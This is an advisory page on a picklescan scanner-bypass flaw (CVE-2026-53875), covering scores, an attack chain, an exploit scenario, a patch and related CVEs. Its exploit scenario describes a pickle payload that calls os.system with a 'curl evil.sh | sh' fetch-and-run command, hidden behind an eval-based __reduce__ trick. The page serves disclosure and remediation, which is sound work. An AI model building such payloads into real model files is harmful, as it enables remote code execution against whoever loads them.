Skip to main content

picklescan CVE-2026-53875

HIGH
Eval Injection (CWE-95)
2026-06-17 VulnCheck
7.1
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
7.1 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
8.8 HIGH

Malicious model is delivered over the network with no auth to the scanner (AV:N/PR:N), but the victim must invoke torch.load with unsafe deserialization (UI:R); successful __reduce__ yields full code execution, so C/I/A:H.

3.1 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 17, 2026 - 16:52 vuln.today
Analysis Generated
Jun 17, 2026 - 16:52 vuln.today

DescriptionCVE.org

picklescan before 1.0.3 contains a scanning bypass vulnerability in the scan_pytorch function that allows attackers to embed malicious magic numbers via dynamic eval using the __reduce__ trick. Attackers can craft malicious PyTorch payloads that evade picklescan detection while remaining executable, enabling arbitrary code execution when loaded with torch.load().

AnalysisAI

Scanner evasion in picklescan versions prior to 1.0.3 lets an attacker smuggle malicious PyTorch pickle payloads past the scan_pytorch detection routine and gain arbitrary code execution when the model is later loaded with torch.load(). The bypass exploits a parser-differential between picklescan's pickletools.genops()-based magic-number extraction and PyTorch's pickle_module.load(), allowing a __reduce__(eval, ('MAGIC_NUMBER',)) trick to produce files that scan as clean but still deserialize correctly. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Craft PyTorch payload with __reduce__(eval, MAGIC)
Delivery
Upload model to hub/registry
Exploit
Victim runs picklescan <1.0.3, scanner reports clean
Install
Victim calls torch.load(weights_only=False)
C2
pickle VM executes attacker __reduce__
Execute
Arbitrary code runs as loading user
Impact
Persist on ML training host

Vulnerability AssessmentAI

Exploitation Exploitation requires (1) the victim environment to be running picklescan <1.0.3 against the malicious file, (2) the victim to subsequently deserialize the same file with torch.load() using weights_only=False (the legacy default; the safer weights_only=True path does not execute __reduce__ and blocks the attack), and (3) the attacker to be able to deliver a .pt/.pth file to the victim - typically via a public model hub, a shared artifact registry, a supply-chain pull request, or any other channel the victim treats as trusted because picklescan cleared it. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N) scoring 7.1 is internally consistent: delivery is network-borne (downloading a model from Hugging Face, a registry, or a teammate), no authentication is required against the scanner, but a user must actively load the model with torch.load(weights_only=False), which is the UI:P passive interaction. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker publishes a benign-looking PyTorch model (e.g., a fine-tuned LLM checkpoint) on a public model hub, crafted with a payload class whose __reduce__ returns (os.system, ('curl evil.sh | sh',)) and whose magic number is smuggled via a (eval, ('MAGIC_NUMBER',)) reducer. A data scientist or an automated CI step scans the file with picklescan <1.0.3, which reports zero infected files and zero dangerous globals because pickletools.genops() never sees the magic as an INT/LONG opcode. …
Remediation Vendor-released patch: upgrade picklescan to 1.0.3 or later (pip install --upgrade 'picklescan>=1.0.3'); the fix lands in commits 2a8383cfeb4158567f9770d86597300c9e508d0f and 134179474539648ba7dee1317959529fbd0e7f89 referenced from GHSA-97f8-7cmv-76j2. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: inventory all systems and pipelines using picklescan and models previously scanned with vulnerable versions. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2025-10156 CRITICAL POC
9.3 Sep 17

An Improper Handling of Exceptional Conditions vulnerability in the ZIP archive scanning component of mmaitre314 pickles

CVE-2025-46417 MEDIUM POC
6.8 Apr 24

The unsafe globals in Picklescan before 0.0.25 do not include ssl. Rated medium severity (CVSS 6.8), this vulnerability

CVE-2025-1716 MEDIUM POC
5.3 Feb 26

picklescan before 0.0.21 does not treat 'pip' as an unsafe global. Rated medium severity (CVSS 5.3), this vulnerability

CVE-2026-3490 CRITICAL
10.0 Jun 17

Remote code execution against users of picklescan versions prior to 1.0.4 is achievable by smuggling any blocked functio

CVE-2026-53874 CRITICAL
9.3 Jun 17

Arbitrary code execution in picklescan versions prior to 1.0.1 allows attackers to bypass the scanner's malicious pickle

CVE-2025-1889 MEDIUM POC
5.3 Mar 03

picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. Rated m

CVE-2026-56315 CRITICAL
9.3 Jun 23

Remote code execution in picklescan versions prior to 1.0.4 allows attackers to bypass the scanner's safety validation b

CVE-2026-53873 CRITICAL
9.3 Jun 17

Arbitrary code execution bypass in picklescan before 1.0.4 allows attackers to smuggle malicious pickle files past the s

CVE-2025-71325 CRITICAL
9.3 Jun 17

Detection bypass in picklescan versions prior to 0.0.27 allows attackers to smuggle malicious Python pickle files past t

CVE-2025-71323 CRITICAL
9.3 Jun 17

Remote code execution in picklescan before 0.0.33 enables attackers to bypass the tool's malicious-pickle detection by s

CVE-2025-71321 CRITICAL
9.3 Jun 17

Arbitrary file write in picklescan before 0.0.33 lets attackers bypass the tool's dangerous-call blocklist by abusing di

CVE-2025-71320 CRITICAL
9.3 Jun 17

Arbitrary code execution in picklescan before 0.0.33 allows remote attackers to bypass the scanner's malicious-pickle de

Share

CVE-2026-53875 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy